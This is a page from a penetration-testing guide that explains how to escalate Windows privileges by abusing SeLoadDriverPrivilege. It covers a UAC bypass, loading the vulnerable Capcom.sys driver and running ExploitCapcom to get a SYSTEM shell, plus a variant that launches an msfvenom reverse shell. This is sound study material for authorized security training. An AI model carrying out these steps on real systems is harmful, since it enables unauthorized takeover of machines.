search
Total OSCP GuidePayloads All The Things

SeLoadDriverPrivilege

Enable the permission first: Use UACMearrow-up-right to bypass UAC

It's well known that the driver Capcom.sys contains functionality to allow any user to execute shellcode with SYSTEM privileges

Use thisarrow-up-right to load driver

Add these includes:

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"

Next compile it with using cl.exe like so:

cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

hashtag
Add a reference to driver

Then download Capcom.sys driver from herearrow-up-right and save it to C:\temp Then:

The odd syntax \??\ used to reference our malicious driver's ImagePath is an NT Object Patharrow-up-right. The Win32 API will parse and resolve this path to properly locate and load our malicious driver.

hashtag
Verify Driver not loaded

Use DriverView.exearrow-up-right .\DriverView.exe /stext drivers.txt

cat drivers.txt | Select-String -pattern Capcom

Then run the EnableSeLoadDriverPrivilege.exe that was previously compiled EnableSeLoadDriverPrivilege.exe

hashtag
Verify Capcom Driver is Listed

hashtag
Use ExploitCapcom Tool to Escalate Privileges

Use ExploitCapcomarrow-up-right after compiling

Now we get a system shell

hashtag
No gui

If we do not have GUI access to the target, we will have to modify the ExploitCapcom.cpp code before compiling. Here we can edit line 292 and replace "C:\\Windows\\system32\\cmd.exe" with, say, a reverse shell binary created with msfvenom, for example: c:\ProgramData\revshell.exe.

The Command Line string in this example would be changed to:

hashtag
Automating with EopLoadDriver

EopLoadDriverarrow-up-right

We would then run ExploitCapcom.exe to pop a SYSTEM shell or run our custom binary.

PreviousSeManageVolumePrivilegeNextDnsAdmins

Last updated